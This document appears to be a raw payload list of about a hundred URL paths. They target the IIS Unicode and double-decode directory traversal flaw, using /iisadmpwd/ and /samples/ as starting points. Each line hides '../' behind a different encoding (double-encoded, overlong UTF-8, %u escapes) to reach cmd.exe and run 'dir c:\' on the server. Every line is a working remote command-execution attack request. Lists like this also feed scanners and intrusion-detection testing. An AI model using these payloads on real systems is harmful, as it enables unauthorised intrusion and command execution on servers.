/iisadmpwd/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
/iisadmpwd/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir+c:\
/iisadmpwd/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
/iisadmpwd/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
/iisadmpwd/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
/iisadmpwd/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c:\
/iisadmpwd/..%255c../winnt/system32/cmd.exe?/c+dir+c:\
/iisadmpwd/..%c0%9v../..%c0%9v../..%c0%9v../winnt/system32/cmd.exe?/c+dir+c:\
/iisadmpwd/..%c0%9v../winnt/system32/cmd.exe?/c+dir+c:\
/iisadmpwd/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
/iisadmpwd/..%C0%AF..%C0%AF..%C0%AF..%C0%AFwinnt/system32/cmd.exe?/c+dir+c:\
/iisadmpwd/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
/iisadmpwd/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
/iisadmpwd/..%c0%qf../..%c0%qf../..%c0%qf../winnt/system32/cmd.exe?/c+dir+c:\
/iisadmpwd/..%c0%qf../winnt/system32/cmd.exe?/c+dir+c:\
/iisadmpwd/..%C1%1C..%C1%1C..%C1%1C..%C1%1Cwinnt/system32/cmd.exe?/c+dir+c:\
/iisadmpwd/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\
/iisadmpwd/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\
/iisadmpwd/..%c1%8s../..%c1%8s../..%c1%8s../winnt/system32/cmd.exe?/c+dir+c:\
/iisadmpwd/..%c1%8s../winnt/system32/cmd.exe?/c+dir+c:\
/iisadmpwd/..%C1%9C..%C1%9C..%C1%9C..%C1%9Cwinnt/system32/cmd.exe?/c+dir+c:\
/iisadmpwd/..%c1%9c../..%c1%9c../..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:\
/iisadmpwd/..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:\
/iisadmpwd/..%c1%9c/winnt/system32/cmd.exe?/c+dir+c:\
/iisadmpwd/..%c1%af../..%c1%af../..%c1%af../winnt/system32/cmd.exe?/c+dir+c:\
/iisadmpwd/..%c1%af../winnt/system32/cmd.exe?/c+dir+c:\
/iisadmpwd/..%c1%pc../..%c1%pc../..%c1%pc../winnt/system32/cmd.exe?/c+dir+c:\
/iisadmpwd/..%c1%pc../winnt/system32/cmd.exe?/c+dir+c:\
/iisadmpwd/..%e0%80%af../..%e0%80%af../..%e0%80%af../winnt/system32/cmd.exe?/c+dir+c:\
/iisadmpwd/..%e0%80%af../winnt/system32/cmd.exe?/c+dir+c:\
/iisadmpwd/..%f0%80%80%af../..%f0%80%80%af../..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir+c:\
/iisadmpwd/..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir+c:\
/iisadmpwd/..%f8%80%80%80%af../..%f8%80%80%80%af../..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+dir+c:\
/iisadmpwd/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+dir+c:\
/iisadmpwd/..%fc%80%80%80%80%af../..%fc%80%80%80%80%af../..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+dir+c:\
/iisadmpwd/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+dir+c:\
/iisadmpwd/..%u0025%u005c..%u0025%u005cwinnt/system32/cmd.exe?/c+dir+c:\
/iisadmpwd/..%u00255c..%u005cwinnt/system32/cmd.exe?/c+dir+c:\
/iisadmpwd/..%u002e..%u002e/winnt/system32/cmd.exe?/c+dir+c:\
/iisadmpwd/..%u002f..%u002fwinnt/system32/cmd.exe?/c+dir+c:\
/iisadmpwd/..%u005c..%u005cwinnt/system32/cmd.exe?/c+dir+c:\
/samples/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63../winnt/system32/cmd.exe?/c+dir+c:\
/samples/..%%35%63..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:\
/samples/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:\
/samples/..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:\
/samples/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir+c:\
/samples/..%%35c..%%35c..%%35c..%%35c..%%35c../winnt/system32/cmd.exe?/c+dir+c:\
/samples/..%%35c..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:\
/samples/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:\
/samples/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir+c:\
/samples/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63../winnt/system32/cmd.exe?/c+dir+c:\
/samples/..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+c:\
/samples/..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+c:\
/samples/..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+c:\
/samples/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir+c:\
/samples/..%252f..%252f..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir+c:\
/samples/..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir+c:\
/samples/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
/samples/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir+c:\
/samples/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
/samples/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
/samples/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
/samples/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c:\
/samples/..%255c../winnt/system32/cmd.exe?/c+dir+c:\
/samples/..%c0%9v../..%c0%9v../..%c0%9v../winnt/system32/cmd.exe?/c+dir+c:\
/samples/..%c0%9v../winnt/system32/cmd.exe?/c+dir+c:\
/samples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
/samples/..%C0%AF..%C0%AF..%C0%AF..%C0%AFwinnt/system32/cmd.exe?/c+dir+c:\
/samples/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
/samples/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
/samples/..%c0%qf../..%c0%qf../..%c0%qf../winnt/system32/cmd.exe?/c+dir+c:\
/samples/..%c0%qf../winnt/system32/cmd.exe?/c+dir+c:\
/samples/..%C1%1C..%C1%1C..%C1%1C..%C1%1Cwinnt/system32/cmd.exe?/c+dir+c:\
/samples/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\
/samples/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\
/samples/..%c1%8s../..%c1%8s../..%c1%8s../winnt/system32/cmd.exe?/c+dir+c:\
/samples/..%c1%8s../winnt/system32/cmd.exe?/c+dir+c:\
/samples/..%C1%9C..%C1%9C..%C1%9C..%C1%9Cwinnt/system32/cmd.exe?/c+dir+c:\
/samples/..%c1%9c../..%c1%9c../..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:\
/samples/..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:\
/samples/..%c1%9c/winnt/system32/cmd.exe?/c+dir+c:\
/samples/..%c1%af../..%c1%af../..%c1%af../winnt/system32/cmd.exe?/c+dir+c:\
/samples/..%c1%af../winnt/system32/cmd.exe?/c+dir+c:\
/samples/..%c1%pc../..%c1%pc../..%c1%pc../winnt/system32/cmd.exe?/c+dir+c:\
/samples/..%c1%pc../winnt/system32/cmd.exe?/c+dir+c:\
/samples/..%e0%80%af../..%e0%80%af../..%e0%80%af../winnt/system32/cmd.exe?/c+dir+c:\
/samples/..%e0%80%af../winnt/system32/cmd.exe?/c+dir+c:\
/samples/..%f0%80%80%af../..%f0%80%80%af../..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir+c:\
/samples/..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir+c:\
/samples/..%f8%80%80%80%af../..%f8%80%80%80%af../..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+dir+c:\
/samples/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+dir+c:\
/samples/..%fc%80%80%80%80%af../..%fc%80%80%80%80%af../..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+dir+c:\
/samples/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+dir+c:\
/samples/..%u0025%u005c..%u0025%u005cwinnt/system32/cmd.exe?/c+dir+c:\
/samples/..%u00255c..%u005cwinnt/system32/cmd.exe?/c+dir+c:\
/samples/..%u002e..%u002e/winnt/system32/cmd.exe?/c+dir+c:\
/samples/..%u002f..%u002fwinnt/system32/cmd.exe?/c+dir+c:\
/samples/..%u005c..%u005cwinnt/system32/cmd.exe?/c+dir+c:\